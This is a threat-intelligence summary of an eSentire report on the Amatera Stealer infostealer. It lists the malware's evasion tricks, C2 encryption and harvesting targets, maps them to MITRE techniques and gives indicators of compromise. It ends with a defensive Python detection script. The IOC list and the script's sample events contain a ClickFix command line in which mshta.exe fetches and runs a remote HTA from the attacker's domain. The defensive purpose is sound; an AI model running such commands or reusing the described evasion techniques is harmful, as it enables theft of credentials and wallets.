eSentire TRU intercepted an attempted delivery of Amatera Stealer in a Finance customer environment and documented major changes in its loader, evasion, and C2 encryption. The report also highlights expanded harvesting for browsers, wallets, Discord, Signal, and Downloads, along with IOCs tied to the ClickFix chain, oakenfjrod.ru, compactedtightness.cfd, and 77.91.97.244. #AmateraStealer #ClickFix #oakenfjrod.ru #compactedtightness.cfd #NetSupportRAT #SheldIO
Keypoints
- eSentire TRU intercepted an attempted Amatera Stealer delivery in a Finance industry customer environment in late April 2026.
- Amatera Stealer is a rebranded version of ACR (AcridRain) Stealer and has been active in some form since at least 2018.
- The attack chain began with ClickFix and progressed through PowerShell stages that executed 32-bit shellcode in memory.
- The shellcode loader uses reflective loading, XOR decryption, aPLib decompression, API hashing, and import resolution before invoking the payload.
- Amatera's C2 encryption changed from AES-256-CBC to ECDH on NIST P-256 with ChaCha20-Poly1305, making network decryption much harder without memory captures.
- New evasion features include anti-debugging, hardware breakpoint checks, sandbox/VM checks, geofencing for Kaspersky and Ukrainian keyboard layouts, and XOR-encoded WoW64 SSNs.
- Harvesting has expanded significantly to include more browsers, wallet extensions, desktop wallets, Discord, Signal attachments, and the Downloads directory.
MITRE Techniques
- [T1620] Reflective Code Loading – The shellcode functions as a reflective loader that decrypts, decompresses, and transfers execution to the embedded payload ("Functions as a reflective loader that decrypts, decompresses, and transfers execution to a DLL or EXE payload.").
- [T1055] Process Injection – The loader maps the payload's sections into memory and performs reflective PE injection before execution ("the reflective injection process begins by mapping the payload's sections into a newly allocated PAGE_READWRITE buffer").
- [T1027] Obfuscated Files or Information – The malware uses XOR, XTEA, aPLib compression, control-flow flattening, and encoded SSNs to hinder analysis ("String encryption uses XTEA"; "SysCall SSNs are now stored XOR encoded").
- [T1057] Process Discovery – The malware enumerates running processes during anti-emulation and sandbox checks ("Checks if there are less than 6 running processes" and "compares each process name").
- [T1012] Query Registry – It enumerates the Uninstall registry key to detect emulators ("enumerating the registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall").
- [T1082] System Information Discovery – It checks OS version fields and keyboard layout to decide whether to execute ("ensuring LdrpHandleTlsData is only called on hosts running Windows 8.1 or higher"; "checks the victim's active keyboard layout").
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – The malware checks for sandbox and VM-related processes and environment artifacts ("known sandbox/VM process names"; "qemu-ga.exe"; "vboxservice").
- [T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks – It uses environment heuristics like installed program count and process count to detect emulation ("If fewer than 5 subkeys are found"; "If fewer than 6 processes are running").
- [T1016] System Network Configuration Discovery – The malware checks the Ukrainian keyboard layout as part of geofencing ("the low byte is checked for 0x22 (Ukrainian keyboard layout)").
- [T1112] Modify Registry – It reads registry locations related to installed software during emulator checks ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall").
- [T1003] OS Credential Dumping – The stealer targets password managers and browser data associated with credentials and secrets ("Password manager file globs broadened for Bitwarden, 1Password, RoboForm, and NordPass").
- [T1217] Browser Session Discovery – It harvests browser data, extensions, and profiles from a widened set of browsers ("Browser targets nearly doubled (37 to 65)").
- [T1119] Automated Collection – The file grabber searches Downloads for sensitive files and broad file patterns ("File grabber updated to search the victim's Downloads directory").
- [T1041] Exfiltration Over C2 Channel – Exfiltrated data is compressed into zip archives and sent through the C2 channel ("Every zip archive contains a txt file ... that stores the victim device fingerprint").
Indicators of Compromise
- [URL] initial delivery / dropper hosting – hxxps://download.version-516[.]com/other
- [Domain Name] second-stage dropper domain and C2 – oakenfjrod.ru, compactedtightness.cfd
- [IP Address] Amatera C2 infrastructure – 77.91.97.244
- [Command Line] ClickFix execution / encoded PowerShell launch – mshta.exe hxxps://download.version-516[.]com/other, powershell -E
- [File Hash] HTA dropper and shellcode/payload samples – 534460224e1140ca7f512daea7258a9fce40dc0daef6994d79d08bdf4ce3e4b8, e913fa5b2dd0a7fc3dbaf0a6f882b3ead9a58511bd945b6e5c478cbd2b900508
- [File Hash] unpacked Amatera Stealer – ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772, and 1 other item
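The ClickFix launch listed above (mshta.exe pulling a remote HTA, then an encoded PowerShell stage) is easy to hunt for in process-creation telemetry. The following Python is an added example, not eSentire's code or tooling: it runs three checks over constructed Image|ParentImage|CommandLine events (the sample events and the harmless encoded Write-Host payload are made up here; only the domains and IP come from the IOC list), flags mshta.exe loading remote content, decodes a PowerShell -E/-EncodedCommand blob (UTF-16LE base64) so an analyst can read it, and matches the report's network IOCs.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Network indicators from the report summary above (re-fanged here for matching).
IOC_DOMAINS = {"download.version-516.com", "oakenfjrod.ru", "compactedtightness.cfd"}
IOC_IPS = {"77.91.97.244"}

# Captures the host of any http(s) URL on a command line.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
# Captures the base64 blob after PowerShell's -E / -EC / -Enc / -EncodedCommand switch.
PS_ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    detail: str


def encode_ps(command: str) -> str:
    """Encode a command the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse of encode_ps; returns None when the blob is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed process-creation events (Image|ParentImage|CommandLine), not real telemetry.
# The encoded PowerShell payload is a harmless Write-Host generated at import time.
SAMPLE_EVENTS = [
    "C:\\Windows\\System32\\mshta.exe|C:\\Windows\\explorer.exe|"
    "mshta.exe https://download.version-516.com/other",
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\mshta.exe|"
    "powershell -E " + encode_ps("Write-Host 'hello'"),
    "C:\\Windows\\System32\\mshta.exe|C:\\Windows\\explorer.exe|"
    "mshta.exe C:\\Users\\alice\\Desktop\\local.hta",
    "C:\\Program Files\\Git\\cmd\\git.exe|C:\\Windows\\explorer.exe|git pull",
]


def analyze_event(line: str) -> List[Finding]:
    """Apply the three ClickFix-oriented checks to one event and return any findings."""
    image, parent, cmdline = line.split("|", 2)
    exe = image.rsplit("\\", 1)[-1].lower()
    parent_exe = parent.rsplit("\\", 1)[-1].lower()
    findings: List[Finding] = []

    # Rule 1: mshta.exe given a URL means a remote HTA was fetched and run (the ClickFix entry point).
    hosts = [h.lower() for h in URL_RE.findall(cmdline)]
    if exe == "mshta.exe" and hosts:
        findings.append(Finding("mshta_remote_hta", f"mshta.exe loaded remote content from {hosts[0]}"))

    # Rule 2: PowerShell with an encoded command; note when mshta.exe is the parent, as in the chain above.
    match = PS_ENC_RE.search(cmdline)
    if exe == "powershell.exe" and match:
        decoded = decode_encoded_command(match.group(1))
        detail = f"encoded command decodes to: {decoded!r}" if decoded else "encoded command did not decode as UTF-16LE"
        if parent_exe == "mshta.exe":
            detail += " (spawned by mshta.exe)"
        findings.append(Finding("powershell_encoded", detail))

    # Rule 3: any reference to a network IOC from the report, whatever the process.
    lowered = cmdline.lower()
    for ioc in sorted(IOC_DOMAINS | IOC_IPS):
        if ioc in lowered:
            findings.append(Finding("known_ioc", f"command line references {ioc}"))
    return findings


def scan(events: List[str]) -> dict:
    """Return {event_index: findings} for events that triggered at least one rule."""
    results = {}
    for idx, event in enumerate(events):
        found = analyze_event(event)
        if found:
            results[idx] = found
    return results


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        for f in found:
            print(f"event {idx}: [{f.rule}] {f.detail}")
```

The local-HTA event deliberately produces no finding: mshta.exe by itself is noisy in many estates, so the rule keys on the remote fetch rather than the binary. Decoding the -E blob before alerting lets the analyst see the staged command instead of an opaque string, which is where the PowerShell stages described in the report would appear.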
Read more: https://www.esentire.com/blog/amatera-stealer-4-0-2-beta-whats-new-in-this-variant